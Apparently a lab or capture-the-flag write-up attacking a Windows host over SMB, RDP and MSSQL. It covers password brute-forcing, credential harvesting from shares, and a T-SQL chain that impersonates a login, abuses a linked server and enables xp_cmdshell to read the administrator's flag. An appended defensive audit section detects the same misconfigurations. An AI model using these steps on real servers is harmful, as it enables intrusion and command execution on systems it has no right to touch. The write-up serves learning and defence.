# Recon

- Update `/etc/hosts`
- Ping test ![[images/Pasted image 20251021085014.png]]
- Light nmap scan ![[images/Pasted image 20251021085100.png]]
- OS nmap scan - MSSQL also in play ![[images/Pasted image 20251021085143.png]]
- Detailed nmap scan with scripts ![[images/Pasted image 20251021085316.png]]
- UDP nmap scan ![[images/Pasted image 20251021085424.png]]

# Initial Plan

1) Attack SMB
2) Attack MSSQL
3) Finish off with RDP

- Ends up being the wrong sequence - actual order: SMB > RDP > MSSQL

# SMB Enum

- Nmap script scan ![[images/Pasted image 20251021085632.png]]
- Attempt null session - we get a listing of shares but no RW ![[images/Pasted image 20251021085702.png]]
- `smbmap` with null session - error ![[images/Pasted image 20251021085826.png]]
- `nxc smb` scan with anonymous login - access_denied ![[images/Pasted image 20251021085917.png]]
- Attempt brute force with the given user simon and the given `pws.list` - we have guest creds for simon ![[images/Pasted image 20251021090106.png]]
- Create creds, users, passwords files
- Now we have read access to the Home share ![[images/Pasted image 20251021090259.png]]
- Spider share ![[images/Pasted image 20251021090636.png]]
- Use `smbclient` to view files - multiple folders - only IT has files ![[images/Pasted image 20251021090827.png]]
- Grab Simon's files ![[images/Pasted image 20251021091027.png]]
- `random.txt` has some potential passwords ![[images/Pasted image 20251021091505.png]]
- Grab Fiona's creds ![[images/Pasted image 20251021090919.png]]
- Potential Windows passwords for Fiona in `creds.txt` ![[images/Pasted image 20251021091543.png]]
- Grab all files under John ![[images/Pasted image 20251021091038.png]]
- Looks like John's files have some hints ![[images/Pasted image 20251021091418.png]]
- Dump all potential passwords into one file for spraying purposes ![[images/Pasted image 20251021091856.png]]
- Enum SMB with simon again using the combined list above - still guest access ![[images/Pasted image 20251021092403.png]]
- Enum SMB with fiona ![[images/Pasted image 20251021092023.png]] ![[images/Pasted image 20251021092051.png]]
- Add entry to creds file for fiona
- Enum SMB with john - guest access with same password as simon (weird??) ![[images/Pasted image 20251021092341.png]]

# MSSQL Enum

- Try `nxc mssql` scan ![[images/Pasted image 20251021092650.png]]
- Try login with fiona using `sqlcmd` - login failed ![[images/Pasted image 20251021092946.png]]
- Try login with fiona using `sqsh` - failure with SQL auth ![[images/Pasted image 20251021093047.png]] - success with local account Windows auth ![[images/Pasted image 20251021093103.png]]
- Several dbs to explore ![[images/Pasted image 20251021093155.png]]
- Try `xp_cmdshell` - disabled ![[images/Pasted image 20251021093254.png]]
- Try to enable - no perms to enable ![[images/Pasted image 20251021093336.png]]
- Poke around dbs - issues with `sqsh` not showing output for commands - HATE `sqsh`
- Try more login attempts with `sqlcmd` - I must have the syntax wrong ![[images/Pasted image 20251021095302.png]]
- Give up on remote MSSQL enumeration - try RDP for local MSSQL enumeration

# RDP Enum

- `xfreerdp3` with fiona - we're on the box ![[images/Pasted image 20251021095523.png]]
- Use Microsoft SQL Server Management Studio ![[images/Pasted image 20251021095630.png]]
- MS SSMS GUI not working - instead, go to PowerShell and run `sqlcmd -S WIN-HARD` to open MSSQL
- See who we can impersonate ![[images/Pasted image 20251021100255.png]]
- Verify no sysadmin for current user ![[images/Pasted image 20251021100428.png]]
- Impersonate john - looks like john is not a sysadmin ![[images/Pasted image 20251021100937.png]]
- Impersonate simon - errors ![[images/Pasted image 20251021100953.png]]
- Identify linked servers - a server with `isremote` value 0 is a linked server ![[images/Pasted image 20251021101016.png]]
- Try to log in to `LOCAL.TEST.LINKED.SRV` as john - error ![[images/Pasted image 20251021101506.png]] - that's the local server, try with the other one ![[images/Pasted image 20251021102028.png]]
- Now `type` the flag - cannot do this as is, need `xp_cmdshell` ![[images/Pasted image 20251021102625.png]]
- Enable `xp_cmdshell` ![[images/Pasted image 20251021103102.png]]
- Use `xp_cmdshell` to type flag - syntax error ![[images/Pasted image 20251021103132.png]]
- **Syntax** is very important here ![[images/Pasted image 20251021105255.png]]

```mssql
-- identify who we can impersonate
1> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
2> GO
--output--

-- determine whether the impersonatable user has sysadmin privs
1> USE master
2> EXECUTE AS LOGIN = 'john'
3> SELECT SYSTEM_USER
4> SELECT IS_SRVROLEMEMBER('sysadmin')
5> GO
--output--

-- identify linked servers
1> SELECT srvname, isremote FROM sysservers
2> GO
--output--

-- impersonate user and determine whether they have admin privs on the linked server
1> EXECUTE AS LOGIN = 'john'
2> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV]
3> GO
--output--

-- enable xp_cmdshell if the impersonatable user has admin privs on the linked server
1> EXECUTE AS LOGIN = 'john'
2> EXECUTE('EXECUTE sp_configure ''show advanced options'', 1;RECONFIGURE;EXECUTE sp_configure ''xp_cmdshell'', 1;RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV]
3> GO

-- use xp_cmdshell
1> EXECUTE AS LOGIN = 'john'
2> EXECUTE('xp_cmdshell "type C:\users\administrator\desktop\flag.txt"') AT [LOCAL.TEST.LINKED.SRV]
3> GO
--output--
```
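The chain above works because of three server-level settings: IMPERSONATE grants on a login that is sysadmin somewhere, a linked server whose login mapping carries that privilege across with RPC OUT enabled, and `xp_cmdshell` being enableable. The following DBA-side audit, added here as an example (not part of the original notes), surfaces all three from the catalog views; it assumes a sysadmin session on the instance being reviewed.

```sql
-- Added audit example (constructed, not from the original writeup).
-- 1) IMPERSONATE grants on server logins, and whether the impersonated
--    login is itself sysadmin (the path used via 'john' above).
SELECT  grantee.name                               AS grantee_login,
        target.name                                AS impersonated_login,
        IS_SRVROLEMEMBER('sysadmin', target.name)  AS target_is_sysadmin
FROM    sys.server_permissions p
JOIN    sys.server_principals grantee ON p.grantee_principal_id = grantee.principal_id
JOIN    sys.server_principals target  ON p.major_id = target.principal_id
WHERE   p.class_desc      = 'SERVER_PRINCIPAL'
  AND   p.permission_name = 'IMPERSONATE'
  AND   p.state_desc      = 'GRANT';

-- 2) Linked servers, their login mappings, and whether RPC OUT is on
--    (EXECUTE(...) AT [server] needs is_rpc_out_enabled = 1).
--    local_principal_id = 0 is the default mapping that applies to all logins.
SELECT  s.name                    AS linked_server,
        s.is_rpc_out_enabled,
        ll.local_principal_id,
        lp.name                   AS local_login,
        ll.uses_self_credential,  -- 1: forwards the caller's own credentials
        ll.remote_name            -- fixed remote login used for the mapping, if any
FROM    sys.servers s
LEFT JOIN sys.linked_logins     ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals lp ON lp.principal_id = ll.local_principal_id
WHERE   s.is_linked = 1;

-- 3) Current state of xp_cmdshell and the advanced-options switch that
--    gates it; value_in_use = 1 means it is already enabled.
SELECT  name, value, value_in_use
FROM    sys.configurations
WHERE   name IN ('xp_cmdshell', 'show advanced options');
```

Run the same three queries on each linked server as well, since the writeup's privilege jump happens on the remote side of the link, not on the instance the session started on.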